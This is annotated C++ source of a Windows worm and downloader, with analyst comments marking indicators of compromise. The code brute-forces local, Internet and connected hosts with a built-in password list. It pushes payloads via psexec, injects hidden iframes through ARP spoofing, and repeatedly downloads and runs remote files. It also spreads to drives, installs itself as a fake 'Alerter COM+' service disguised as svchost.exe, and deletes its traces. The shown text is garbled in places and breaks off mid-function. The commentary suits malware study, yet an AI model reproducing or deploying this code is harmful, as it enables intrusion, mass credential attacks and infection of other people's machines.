

// WebDown.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "WebDown.h"
#include "wrom.h"
#include "win32cpp.h"
//#include "ipc.h"
#include <Dbt.h>
#include "winsvc.h"

#include "winsvc.h"

#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")

#include "PingI.h"
#include "winnetwk.h"
#pragma comment(lib,"mpr.lib")

#include <tlhelp32.h>

//#include "afxinet.h"

#include <Iprtrmib.h>

// Built-in credential wordlist used by every spread routine in this file
// (ConnectRemote is invoked once per user x pass pair, so 15 x 21 = 315
// attempts per target host). Both arrays are 0-terminated and walked with
// `for (i = 0; user[i]; i++)`. Detection note: these literal strings make a
// usable static signature for this sample family.
const char *user[]={
"administrator","admin", "guest","alex", "home",
"love","xp", "user","game", "123",
"movie","time", "yeah","money", "xpuser",
0};
// Candidate passwords. The literal "NULL" is special-cased by ConnectRemote
// and means an empty password (`-p ""`), not a missing entry.
const char *pass[]={
"NULL",
"password", "123456","qwerty","abc123", "memory",
"home", "12345678","love","xp", "88888",
"5201314", "1314520","asdfgh","alex", "angel",
"123", "asdf","baby","woaini", "movie",
0};



/////////////////////////////////////////////////////////////////////////////
// Runtime configuration block ("builder" patch area). WinMain runs
// DecryptRecord(&modify_data, sizeof, "1314") over this struct in place before
// it is read, so an operator presumably patches an encrypted copy into the
// binary; the plaintext 127.0.0.1 defaults below look like placeholders.
// Note for analysts: throughout this copy of the file printf-style specifiers
// appear as `>s` / `>d` (a hosting-site garble of `%s` / `%d`).
struct MODIFY_DATA
{
char DownFile[100];// URL of the download list; polled by DOWN_thread and WndProc timer 2
char DownRunFile[100]; // URL of the psexec.exe payload fetched by ConnectRemote
char DownRunURLFile[100]; // URL of the servrr.exe payload that psexec copies to each remote host
char ArpInject[256]; // HTML snippet handed to ArpW.exe -insert (drive-by iframe injection into port-80 traffic)
char DownRunArpFile[100]; // base URL for the ARP toolkit: arp.exe, nogui.exe, wpcap.dll, packet.dll, wanpacket.dll
char DownRunBindFile[100]; // URL of the file binder dropped as BindF.exe
bool IsWorm;// start Bind_thread (binder infection)
bool IsUpan;// copy to fixed drives at start-up and to newly arrived volumes (autorun.inf + setup.exe)
bool IsShare;// start TCP_thread: LAN / WAN / netstat-peer credential brute force
bool IsAnti;// enable the 1-second anti-AV timer in WndProc (window killing + Register())
bool IsARP; // start ARP_thread
int WaitTime;// poll interval in minutes for the download list
}modify_data =
{
"http://127.0.0.1/down.list",
"http://127.0.0.1/",
"http://127.0.0.1/",
"<iframe src='http://xxx.htm' width=0 height=0>",
"http://127.0.0.1/",
"http://127.0.0.1/",
false,
false,
false,
false,
false,
20,
};

// Handle of the hidden message-only style window created by CreateMyWindow.
HWND hWnd;
// Last two 8-byte "date" stamps read from the head of the download list
// (GetDownFileDate / WndProc timer 2); a change between them triggers a fetch.
char DownFileDate1[9]="88-88-88";
char DownFileDate2[9]="88-88-88";

// Service-control state shared by ServiceMain, Handler and InstallService.
// The service, mutex, window title and HTTP User-Agent all use "Alerter COM+".
SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;

//======================================
// iphlpapi.dll entry points resolved at runtime by TCPConnect. Only
// GetTcpTable is actually called; GetUdpTable and SetTcpEntry are resolved and
// then unused in this file.
typedef DWORD (WINAPI *GetTcpTableFun)(PMIB_TCPTABLE,PDWORD,BOOL);
typedef DWORD (WINAPI *SetTcpEntryFun) (PMIB_TCPROW );
typedef DWORD (WINAPI *GetUdpTableFun)(PMIB_UDPTABLE,PDWORD,BOOL);

PMIB_TCPTABLE mibtcp; //TCP table view over pTcpBuf
PMIB_UDPTABLE mibUdp; //UDP (never used in this file)
// Fixed 100-row buffer for GetTcpTable; the call is not retried with a larger
// buffer, so on a busy host the table read simply fails.
BYTE pTcpBuf[100*20+4];
char *DisConIPAddr[10]; // unused in this file
int iDisCon; // unused in this file

// NOTE: this global hInst is shadowed by a local of the same name in TCPConnect.
HINSTANCE hInst;
GetTcpTableFun pGetTcp;
GetUdpTableFun pGetUdp;
SetTcpEntryFun pEtyTcp;

//========================================

/*解密数据函数*/
/* Reverses the record obfuscation used on modify_data: every byte has the
 * matching key byte subtracted and is then XORed with that same key byte; the
 * key is reused cyclically. Transforms szRec in place.
 *   szRec - nLen bytes to decode
 *   nLen  - number of bytes to process
 *   szKey - NUL-terminated key (must be non-empty; an empty key is undefined) */
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
    char *keyPos = szKey;

    for (unsigned long idx = 0; idx < nLen; idx++) {
        /* wrap back to the start of the key once its terminator is reached */
        if (*keyPos == '\0')
            keyPos = szKey;

        const char k = *keyPos++;
        /* subtract first, then XOR - the inverse of (b ^ k) + k */
        szRec[idx] = (char)((szRec[idx] - k) ^ k);
    }
}


//====================================================================
// Terminates every running process whose image name equals processName
// (case-insensitive) by walking a Toolhelp snapshot. Not referenced anywhere
// else in this file. As written pe.dwSize is never initialised before
// Process32First and the snapshot handle is not validated, so the walk may
// fail silently; OpenProcess handles are never closed.
void KillProcess(char * processName)
{
HANDLE hSnapshot;
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe;
Process32First(hSnapshot,&amt;pe);
do
{ CString KillProcessName = processName;
if(KillProcessName.CompareNoCase(pe.szExeFile) == 0)
{
HANDLE hProcess;
hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID);
if (hProcess)
{
TerminateProcess(hProcess,0);// kill the matching process (handle is leaked)
}
}
}
while(Process32Next(hSnapshot,&amt;pe));
CloseHandle(hSnapshot);
}


// Lateral-movement primitive: one credential attempt against RemoteIP.
// Drops psexec.exe and servrr.exe into the system directory (re-downloaded on
// EVERY call, i.e. hundreds of times per target - very noisy on the wire) and
// runs `psexec.exe \\RemoteIP -u user -p pass -c servrr.exe -d` hidden.
// The password literal "NULL" is turned into an empty quoted password.
// Returns the raw WinExec result (> 31 means the local psexec process was
// started; it says nothing about whether the remote logon succeeded).
// Note: the first declaration line repeats `char` inside the declarator list,
// which is a syntax error as shown; sPwd is only 20 bytes (wordlist passwords
// are shorter than that, so this never overflows with the built-in list).
DWORD ConnectRemote(const char *RemoteIP,const char *lpUserName,const char *lpPassword)
{
char sDownRunFileUP[256], sDownRunFileServer[256], char sPwd[20];
memset(sDownRunFileUP, 0, 256);
memset(sDownRunFileServer, 0, 256);
sprintf(sDownRunFileUP, ">s", modify_data.DownRunFile);
sprintf(sDownRunFileServer, ">s", modify_data.DownRunURLFile);

char SysDirBuff[256], File1[256], File2[256];
memset(File1, 0, 256);
memset(File2, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(File1, ">s\\psexec.exe", SysDirBuff);
sprintf(File2, ">s\\servrr.exe", SysDirBuff);

// IOC: <system32>\psexec.exe and <system32>\servrr.exe written from the C2 URLs
URLDownloadToFile(0, sDownRunFileUP, File1, 0, 0);
URLDownloadToFile(0, sDownRunFileServer, File2, 0, 0);

memset(sPwd, 0, 20);
if(strcmp(lpPassword, "NULL") == 0)
sprintf(sPwd, "\">s\"", "");
else
sprintf(sPwd, ">s", lpPassword);

char filesring[2048];
memset(filesring, 0, 2048);
sprintf(filesring, ">s\\psexec.exe \\\\>s -u >s -p >s -c >s\\servrr.exe -d", SysDirBuff, RemoteIP, lpUserName, sPwd, SysDirBuff);
Sleep(1000);
int nRet = WinExec(filesring, SW_HIDE);
return nRet;
}

// Returns ch cut just after its second '.' (e.g. "10.1.2.3" -> "10.1."), or an
// empty string when fewer than two dots are present. getipfun uses this to keep
// the /16 prefix of the public address. The loop deliberately keeps scanning
// after the cut point, matching the original behaviour.
CString jian2(CString ch)
{
    CString prefix;
    int dotsSeen = 0;
    const int len = ch.GetLength();

    for (int pos = 0; pos < len; ++pos)
    {
        if (ch.GetAt(pos) != '.')
            continue;
        ++dotsSeen;
        if (dotsSeen == 2)
            prefix = ch.Left(pos + 1);
    }

    return prefix;
}

// Keeps only characters that can occur in a dotted IPv4 literal (digits and
// '.'), discarding everything else. getipfun applies it to a slice of scraped
// HTML to extract the public address; non-IP characters are skipped rather than
// terminating the scan.
CString jian(CString ch)
{
    CString digitsAndDots;
    const int len = ch.GetLength();

    for (int pos = 0; pos < len; ++pos)
    {
        const char c = ch.GetAt(pos);
        const bool isIpChar = (c >= '0' && c <= '9') || c == '.';
        if (isIpChar)
            digitsAndDots += c;
    }

    return digitsAndDots;
}


// Strips the final octet of a dotted IPv4 string and returns the prefix up to
// and including the last '.' (e.g. "192.168.1.100" -> "192.168.1."). Only the
// last three characters are examined, so the trailing octet is assumed to be
// at most three digits; the callers then append their own host numbers.
CString jian1(CString ch)
{
    CString tail = ch.Right(3);
    const int tailLen = tail.GetLength();

    // Whatever follows the last '.' inside the 3-char tail is the octet to drop.
    for (int pos = 0; pos < tailLen; ++pos)
    {
        if (tail.GetAt(pos) == '.')
        {
            tail = tail.Right(3 - (pos + 1));
            break;
        }
    }

    return ch.Left(ch.GetLength() - tail.GetLength());
}



//取得公网IP
// Public-IP discovery followed by an Internet-facing brute force. Fetches an
// external "what is my IP" page, scrapes the address, keeps its first two
// octets (jian2) and then calls ConnectRemote with the whole credential list
// against every host X.Y.[90..254].[2..254] other than itself - roughly
// 165 x 253 hosts x 315 credential pairs, each pair re-downloading two payloads.
// If the page is unreachable the scraping still runs on an empty string.
void getipfun()
{
CInternetSession session; // MFC HTTP session used to fetch the lookup page
CHttpFile *pFile=NULL;
CString str,ch; // alternate lookup site noted by the author: www.ip138.com/ips8.asp
CString m_szSite="http://union.itlearner.com/ip/getip.asp"; // external service that echoes the requester's public IP (IOC: outbound GET to this host)
try{
pFile=(CHttpFile*)session.OpenURL(m_szSite);} // open the lookup URL
catch(CInternetException *pEx) // network failure: proceed with an empty page
{
pFile=NULL;
pEx->Delete();
}
if(pFile)
{
while(pFile->ReadString(str)) // accumulate the response body line by line
{
ch+=str+"\r\n";
}
pFile->Close();
delete pFile;
}
else
{
ch+="";
}
CString lin;
CString aaaa;
// Locate the <input name="ip"> tag and carve a window that should contain the address;
// a failed Find() yields -1 and the slices start near the beginning of the page.
lin=ch.Mid(ch.Find("input name=\"ip\"")+2,50);
lin=lin.Mid(lin.Find(".") - 3,15);
lin=jian(lin); // keep digits and dots only

CString bbb = jian2(lin);
CString cccccc;
for(int j = 90; j < 255; j ++)
{
for(int n = 2; n < 255; n ++)
{
cccccc.Empty();
cccccc.Format(">s>d.>d", bbb, j, n);
if(cccccc.CompareNoCase(lin) != 0) // skip our own public address
{
for(int mm = 0;user[mm]; mm++)
{
for (int k=0;pass[k];k++)
{
ConnectRemote(cccccc, user[mm], pass[k]);
}
}

}

}


}

}

//==================================================================================
// ARP-spoofing drive-by stage. Downloads a toolkit from DownRunArpFile into
// the system directory (arp.exe saved as ArpW.exe, nogui.exe, wpcap.dll,
// packet.dll, wanpacket.dll - the last four look like a silent WinPcap
// install), runs nogui.exe, waits 50 s for it, then launches
// `ArpW.exe -idx 0 -ip <RemoteIP> -port 80 -insert "<ArpInject>"`, which by
// its arguments injects the configured HTML into port-80 traffic for the given
// IP range on adapter 0. RemoteIP is a range string like "A.B.C.2-A.B.C.255"
// (see LocalToArp). Always returns 0; download failures are not checked.
DWORD ArpRemote(const char *RemoteIP)
{
char SysDirBuff[256], ArpFile[256], strDownRunArpFile[256], strDownRunWincap[256],
strWpCapDll[256], strPaketdll[256], strwanpacketdll[256],
DownRunWincap[256], WpCapDll[256], Paketdll[256], wanpacketdll[256];
memset(ArpFile, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(ArpFile, ">s\\ArpW.exe", SysDirBuff);
memset(strDownRunArpFile, 0, 256);
memset(strDownRunWincap, 0, 256);
memset(strWpCapDll, 0, 256);
memset(strPaketdll, 0, 256);
memset(strwanpacketdll, 0, 256);

memset(DownRunWincap, 0, 256);
memset(WpCapDll, 0, 256);
memset(Paketdll, 0, 256);
memset(wanpacketdll, 0, 256);
// IOC: local drop paths under <system32>
sprintf(DownRunWincap, ">s\\nogui.exe", SysDirBuff);
sprintf(WpCapDll, ">s\\wpcap.dll", SysDirBuff);
sprintf(Paketdll, ">s\\packet.dll", SysDirBuff);
sprintf(wanpacketdll, ">s\\wanpacket.dll", SysDirBuff);

// IOC: remote URLs = <DownRunArpFile>/{arp.exe,nogui.exe,wpcap.dll,packet.dll,wanpacket.dll}
sprintf(strDownRunArpFile, ">s/arp.exe", modify_data.DownRunArpFile);
sprintf(strDownRunWincap, ">s/nogui.exe", modify_data.DownRunArpFile);
sprintf(strWpCapDll, ">s/wpcap.dll", modify_data.DownRunArpFile);
sprintf(strPaketdll, ">s/packet.dll", modify_data.DownRunArpFile);
sprintf(strwanpacketdll, ">s/wanpacket.dll", modify_data.DownRunArpFile);

URLDownloadToFile(0, strDownRunArpFile, ArpFile, 0, 0);
URLDownloadToFile(0, strDownRunWincap, DownRunWincap, 0, 0);
URLDownloadToFile(0, strWpCapDll, WpCapDll, 0, 0);
URLDownloadToFile(0, strPaketdll, Paketdll, 0, 0);
URLDownloadToFile(0, strwanpacketdll, wanpacketdll, 0, 0);

char filesring[2048];
memset(filesring, 0, 2048);
// run the (presumed) WinPcap installer hidden, then give it time to finish
WinExec(DownRunWincap, SW_HIDE);

Sleep(50000);

memset(filesring, 0, 2048);
sprintf(filesring, ">s\\ArpW.exe -idx 0 -ip >s -port 80 -insert \">s\"", SysDirBuff, RemoteIP, modify_data.ArpInject);
WinExec(filesring, SW_HIDE);
return 0;
}

// For every IPv4 address of this host, builds the range "A.B.C.2-A.B.C.255"
// and hands it to ArpRemote, i.e. the whole local /24 is targeted for ARP
// injection. The LVITEM block is vestigial GUI code (never used).
void LocalToArp()
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;

wVersion = MAKEWORD(2,2);
errret = WSAStartup(wVersion,&amt;wsaData);

// bail out silently if Winsock 2.2 is not available
if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
return ;
}

char szHostName[128]; // local host name
struct hostent * pHost; // resolved address list for the local host
int i;
char IPStr[100];

LVITEM lvi; // unused leftover from a list-control UI
lvi.mask=LVIF_IMAGE|LVIF_TEXT;

lvi.iItem=0;
lvi.iSubItem=0;
lvi.iImage=0;

if(gethostname(szHostName,128)==0)
{
pHost = gethostbyname(szHostName);
for( i = 0; pHost!= NULL &amp;&amp; pHost->h_addr_list[i]!= NULL; i++ )
{
CString IPAddress = inet_ntoa (*(struct in_addr *)pHost->h_addr_list[i]);

CString cccc = jian1(IPAddress); // "A.B.C." prefix of this interface

memset(IPStr, 0, 100);

// range string consumed by ArpW.exe -ip
sprintf(IPStr, ">s2->s255", cccc, cccc);

ArpRemote(IPStr);
}
}

WSACleanup();
}

// Thread entry started by ServiceMain when modify_data.IsARP is set; runs the
// ARP-injection stage once and exits. dParam is unused.
unsigned long CALLBACK ARP_thread(LPVOID dParam)
{


LocalToArp();


return 0;
}

//捆绑感染
// Binder stage: downloads modify_data.DownRunBindFile to <system32>\BindF.exe
// and runs it hidden. The download result and WinExec return value (nRet) are
// ignored; always returns 0.
DWORD DownBindRun()
{
char SysDirBuff[256], ArpFile[256];
memset(ArpFile, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(ArpFile, ">s\\BindF.exe", SysDirBuff); // IOC: <system32>\BindF.exe

URLDownloadToFile(0, modify_data.DownRunBindFile, ArpFile, 0, 0);

int nRet = WinExec(ArpFile, SW_HIDE);
return 0;
}

// Thread entry started by ServiceMain when modify_data.IsWorm is set; runs the
// binder download once and exits. dParam is unused.
unsigned long CALLBACK Bind_thread(LPVOID dParam)
{
DownBindRun();

return 0;
}

//==================================================================================

/* 功能说明:查询本机的名称和IP地址. */
/* LAN brute force. For every IPv4 address of this host, tries the whole
 * credential list (ConnectRemote) against A.B.C.[2..254], skipping the host's
 * own address. 253 hosts x 315 credential pairs per interface, sequentially.
 * The LVITEM block is a vestige of list-control UI code and is never used. */
void QueryLocalIP()
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;

wVersion = MAKEWORD(2,2);
errret = WSAStartup(wVersion,&amt;wsaData);

// require Winsock 2.2, otherwise do nothing
if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
return ;
}

char szHostName[128]; // local host name
struct hostent * pHost; // resolved local address list
int i;

LVITEM lvi; // unused UI leftover
lvi.mask=LVIF_IMAGE|LVIF_TEXT;

lvi.iItem=0;
lvi.iSubItem=0;
lvi.iImage=0;

if(gethostname(szHostName,128)==0) // resolve this host's addresses
{
pHost = gethostbyname(szHostName);
for( i = 0; pHost!= NULL &amp;&amp; pHost->h_addr_list[i]!= NULL; i++ )
{
CString IPAddress = inet_ntoa (*(struct in_addr *)pHost->h_addr_list[i]);

CString cccc = jian1(IPAddress); // "A.B.C." prefix
for(int j = 2; j < 255; j ++)
{
CString ddd;
ddd.Format(">s>d", cccc, j);
if(ddd.CompareNoCase(IPAddress) != 0) // do not attack ourselves
{
for(int mm = 0;user[mm]; mm++)
{
for (int k=0;pass[k];k++)
{
ConnectRemote(ddd, user[mm], pass[k]);
}
}

}
}
}
}

WSACleanup();
}

// "netstat" spread: reads the live TCP connection table through iphlpapi and
// brute-forces every remote peer address (except 0.0.0.0 and 127.0.0.1) with
// the credential list - so any host this machine talks to becomes a target.
// Returns 0/FALSE in every path. Notes: the local `hInst` shadows the global;
// the second NULL check on pGetTcp/pGetUdp is unreachable; k = entries-1 means
// the last table row is never visited; the htonl/ntohl pair cancels out.
int TCPConnect()
{
pGetTcp=NULL;
pGetUdp=NULL;
pEtyTcp=NULL;
hInst=NULL;

HINSTANCE hInst = LoadLibrary("iphlpapi.dll");
if(hInst==NULL) return FALSE;

pGetTcp = (GetTcpTableFun)GetProcAddress(hInst, "GetTcpTable");
if(pGetTcp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);

return FALSE;
}
pGetUdp=(GetUdpTableFun)GetProcAddress(hInst,"GetUdpTable");
if(pGetUdp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);
return FALSE;
}

pEtyTcp=(SetTcpEntryFun)GetProcAddress(hInst,"SetTcpEntry");
if(pEtyTcp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);
return FALSE;
}

if(pGetTcp==NULL ||pGetUdp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);
return 0;
}
// netstat-style infection: walk current TCP peers
CString strStatus,strTmp;

BYTE pUdpBuf[100*8+4]; // unused
DWORD dwTableSize;
DWORD lret;
int i,k=0;
in_addr addrLoc,addrRem;
char szLocAddr[100],szRemAddr[100];
DWORD dwLocIP,dwRemIP;
unsigned short nLocalPort,nRemotePort;


// fixed-size buffer: more than 100 connections -> GetTcpTable fails and we return
dwTableSize=100*20+4;
lret=pGetTcp((PMIB_TCPTABLE)pTcpBuf,&amt;dwTableSize,FALSE);
if (lret != NO_ERROR)
{
if (hInst!=NULL) FreeLibrary(hInst);
return 0;
}
mibtcp=(PMIB_TCPTABLE)pTcpBuf;
k=(int)mibtcp->dwNumEntries-1;

for(i=0;i<k;i++){

dwRemIP=htonl(mibtcp->table[i].dwRemoteAddr);
addrRem.S_un.S_addr = ntohl(dwRemIP);
strcpy(szRemAddr, inet_ntoa(addrRem));
// skip unconnected / loopback rows
if(strcmp(szRemAddr, "0.0.0.0") != 0 &amp;&amp; strcmp(szRemAddr, "127.0.0.1") != 0)
{// full user/password enumeration against the peer
for(int mm = 0;user[mm]; mm++)
{
for (int j=0;pass[j];j++)
{
ConnectRemote(szRemAddr, user[mm], pass[j]);
}
}
}


}
if (hInst!=NULL) FreeLibrary(hInst);
return 0;

}

// Spread thread (ServiceMain, modify_data.IsShare). Loops forever: LAN scan,
// then public-IP scan, then netstat peers, then sleeps 20 minutes. The
// interval is hard-coded here and does not use modify_data.WaitTime.
unsigned long CALLBACK TCP_thread(LPVOID dParam)
{


while(1)
{
// local /24
QueryLocalIP();
// Internet-facing /16 slice
getipfun();
// current TCP peers
TCPConnect();

Sleep(20*60000);
}



return 0;
}

// Download thread (always started by ServiceMain). Every WaitTime minutes it
// calls DownExec on modify_data.DownFile, i.e. the configured URL is fetched
// to <system32>\down.exe and executed - the "list" URL is treated as a binary.
unsigned long CALLBACK DOWN_thread(LPVOID dParam)
{


while(1)
{
// fetch-and-run the configured URL
DownExec(modify_data.DownFile);

Sleep(modify_data.WaitTime*60*1000);
}



return 0;
}

// Ping-sweep spread (not referenced anywhere in this file - ServiceMain never
// starts it). Pings A.B.C.[1..253] of the host's LAST resolved address and
// brute-forces hosts that answer. The `break` on ConnectRemote()==0 only
// fires when WinExec itself fails (WinExec returns > 31 on success), so it is
// not a "stop after success" check. Returns FALSE without Winsock 2.2.
unsigned long CALLBACK IPC_thread(LPVOID dParam)
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;

wVersion = MAKEWORD(2,2);
errret = WSAStartup(wVersion,&amt;wsaData);

if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
// MessageBox(NULL,"winsocket library version too low","Notice",MB_OK);
return FALSE;
}

/* resolve the local host name to its address list */
CHAR szHostName[128]={0};
struct hostent * pHost;

int i;

SOCKADDR_IN saddr;

if(gethostname(szHostName,128)==0)
{
pHost = gethostbyname(szHostName);
// only the last address survives this loop; saddr is uninitialised if none resolve
for( i = 0; pHost!= NULL &amp;&amp; pHost->h_addr_list[i]!= NULL; i++ )
{

memset(&amt;saddr,0,sizeof(saddr));
memcpy(&amt;saddr.sin_addr.s_addr, pHost->h_addr_list[i], pHost->h_length);

}
}

char ip[128];
int count;

BOOL bpingOK=FALSE;

for(count=1;count<254;count++)
{
memset(ip,0,128);
sprintf(ip,
">d.>d.>d.>d",
saddr.sin_addr.S_un.S_un_b.s_b1,
saddr.sin_addr.S_un.S_un_b.s_b2,
saddr.sin_addr.S_un.S_un_b.s_b3,
count);
CPingI m_PingI; // ICMP probe helper from PingI.h (project-local)
bpingOK = m_PingI.Ping(2,(LPCSTR)ip,NULL);
if (bpingOK)
{// credential enumeration against responsive hosts only
for(int i = 0;user[i]; i++)
{
for (int j=0;pass[j];j++)
{
if (ConnectRemote(ip,user[i],pass[j])==0)
break;
}
}
}

}

WSACleanup();
//printf("Hello World!\n");
return 0;
}




//=====================================================================


//***********************************************//自删除
//***********************************************// self-delete
// Removes the currently running executable after exit: writes %TEMP%\rs.bat,
// which loops `del`-ing %1 (our own path) until it is gone and then deletes
// itself, and launches it detached via %comspec% /c. IOC: <temp>\rs.bat.
// Note: only 105 bytes of the batch literal are written; as shown the literal
// is longer than that, so the trailing self-cleanup lines are truncated.
void uninstall(void)//Thanks to Spybot
{
char batfile[MAX_PATH];
char tempdir[MAX_PATH];
char tcmdline[MAX_PATH];
char cmdline[MAX_PATH];
char This_File[MAX_PATH];
HANDLE f;
DWORD r;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
GetTempPath(sizeof(tempdir), tempdir);
sprintf(batfile, ">s\\rs.bat", tempdir);
f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
if (f != INVALID_HANDLE_VALUE)
{
// write a batch file to remove our executable once we close
WriteFile(f, "@echo off\r\n"
":start\r\nif not exist \"\">1\"\" goto done\r\n"
"del /F \"\">1\"\"\r\n"
"del \"\">1\"\"\r\n"
"goto start\r\n"
":done\r\n"
"del /F >temp>\rs.bat\r\n"
"del >temp>\r.bat\r\n", 105, &amt;r, NULL);
CloseHandle(f);

memset(&amt;sinfo, 0, sizeof(STARTUPINFO));
sinfo.cb = sizeof(sinfo);
sinfo.wShowWindow = SW_HIDE; // has no effect: STARTF_USESHOWWINDOW is not set in dwFlags
memset(This_File,0,sizeof(This_File));
GetModuleFileName(NULL, This_File, sizeof(This_File));
sprintf(tcmdline, ">>comspec>> /c >s >s", batfile, This_File); // build command line
ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line

// execute the batch file
CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &amt;sinfo, &amt;pinfo);
}
}

// Entry point. Two modes:
//  1. Not running from <system32>\IME\svchost.exe: copy self there (IOC), mark
//     it hidden+system, launch the copy, schedule self-deletion and exit.
//  2. Running from the install path: decrypt the config block and hand control
//     to the SCM as service "Alerter COM+"; if the dispatcher refuses (we were
//     started interactively, not by the SCM) register and start the service.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
int nRetCode = 0;

/// self-copy ----------------------
char SysDirBuff[256];
char filename[256];
char This_File[256];
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
strcpy(filename,SysDirBuff);
strcat(filename,"\\IME\\svchost.exe"); // IOC: <system32>\IME\svchost.exe (note the IME subdirectory)
GetModuleFileName(NULL, This_File, sizeof(This_File));

if (_stricmp(This_File,filename)!=0)
{
DeleteFile(filename);
if(::CopyFile(This_File,filename,FALSE)==0) return -1;
SetFileAttrib(filename);// author's note: "can't copy once it is hidden??"
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&amt;pinfo,0,sizeof(pinfo));
memset(&amt;sinfo,0,sizeof(sinfo));
CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &amt;sinfo, &amt;pinfo);
uninstall();
ExitProcess(0);
}

// decrypt the configuration block in place (key "1314")
DecryptRecord((char*)&amt;modify_data,sizeof(MODIFY_DATA),"1314");

// service entry table -----------------------------
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName="Alerter COM+"; // service name (IOC)
service_tab_entry[0].lpServiceProc=ServiceMain; // service entry point
// several services could be listed; the last entry must be NULL
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;

if (StartServiceCtrlDispatcher(service_tab_entry)==0)// not launched by the SCM: first run
{
InstallService();
}

return nRetCode;
}

/***********************************************/
//服务的真正入口点函数
/***********************************************/
// Real service entry point. Reports RUNNING, enforces a single instance via
// the named mutex "Alerter COM+" (IOC), then starts the worker threads selected
// by the config flags (DOWN_thread always), infects every fixed drive when
// IsUpan is set, and finally runs the hidden window's message loop, which
// hosts the anti-AV timer and USB-arrival handling and never returns.
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
service_status_ss.dwServiceType=SERVICE_WIN32;
service_status_ss.dwCurrentState=SERVICE_START_PENDING;
service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
service_status_ss.dwServiceSpecificExitCode=0;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
service_status_ss.dwWin32ExitCode=0;
if ((handle_service_status=RegisterServiceCtrlHandler("Alerter COM+",Handler))==0)
{
//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);
}// one control handler per service; failure is ignored
service_status_ss.dwCurrentState=SERVICE_RUNNING;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
::SetServiceStatus(handle_service_status,&amt;service_status_ss);

// single-instance mutex -----------------------------------
HANDLE m_hMutex=CreateMutex(NULL,FALSE,"Alerter COM+");
// a second copy sees ERROR_ALREADY_EXISTS
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
// release our handle and exit
CloseHandle(m_hMutex);
m_hMutex=NULL;
ExitProcess(0);
}

// binder infection thread ----------------------------
if (modify_data.IsWorm)//
{
::CreateThread(NULL,0,Bind_thread,NULL,0,NULL);
}
// ARP injection thread
if (modify_data.IsARP)//
{
::CreateThread(NULL,0,ARP_thread,NULL,0,NULL);
}

// credential-based spread thread ---------------------------------------
if (modify_data.IsShare)//
{
::CreateThread(NULL,0,TCP_thread,NULL,0,NULL);
}

// download/execute thread runs unconditionally
::CreateThread(NULL,0,DOWN_thread,NULL,0,NULL);

// copy to every drive letter
if(modify_data.IsUpan)
{// C: through Z:, fixed drives only (removable media is handled on WM_DEVICECHANGE)
for (char cLabel='c'; cLabel<='z'; cLabel++)
{
char strRootPath[] = {"c:\\"};
strRootPath[0] = cLabel;
if(GetDriveType(strRootPath)== DRIVE_FIXED)
{
CopyToUAndSet(strRootPath);
}
}
}



CreateMyWindow(); // blocks in the message loop
return ;
}
/***********************************************/
//服务控制器
/***********************************************/
// Service control handler. Only updates the reported state; a STOP request
// reports SERVICE_STOPPED but does not end the worker threads or the message
// loop, so the process keeps running. SetServiceStatus is invoked twice per
// control (inside the switch and again after it).
void WINAPI Handler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
service_status_ss.dwCurrentState=SERVICE_STOPPED;
::SetServiceStatus(handle_service_status,&amt;service_status_ss);
break;
case SERVICE_CONTROL_CONTINUE:
service_status_ss.dwCurrentState=SERVICE_RUNNING;
::SetServiceStatus(handle_service_status,&amt;service_status_ss);
break;
case SERVICE_CONTROL_PAUSE:
service_status_ss.dwCurrentState=SERVICE_PAUSED;
::SetServiceStatus(handle_service_status,&amt;service_status_ss);
break;
case SERVICE_CONTROL_INTERROGATE:
break;

}
::SetServiceStatus(handle_service_status,&amt;service_status_ss);

}

/***********************************************/
/***********************************************/
// Persistence: creates (or re-opens) the auto-start, interactive service
// "Alerter COM+" whose image is <system32>\IME\svchost.exe, then starts it.
// The handle returned by CreateService is immediately overwritten by
// OpenService and leaked. Returns false only if the SCM cannot be opened.
bool InstallService()
{
DWORD dwErrorCode;

char szSysDir[256];
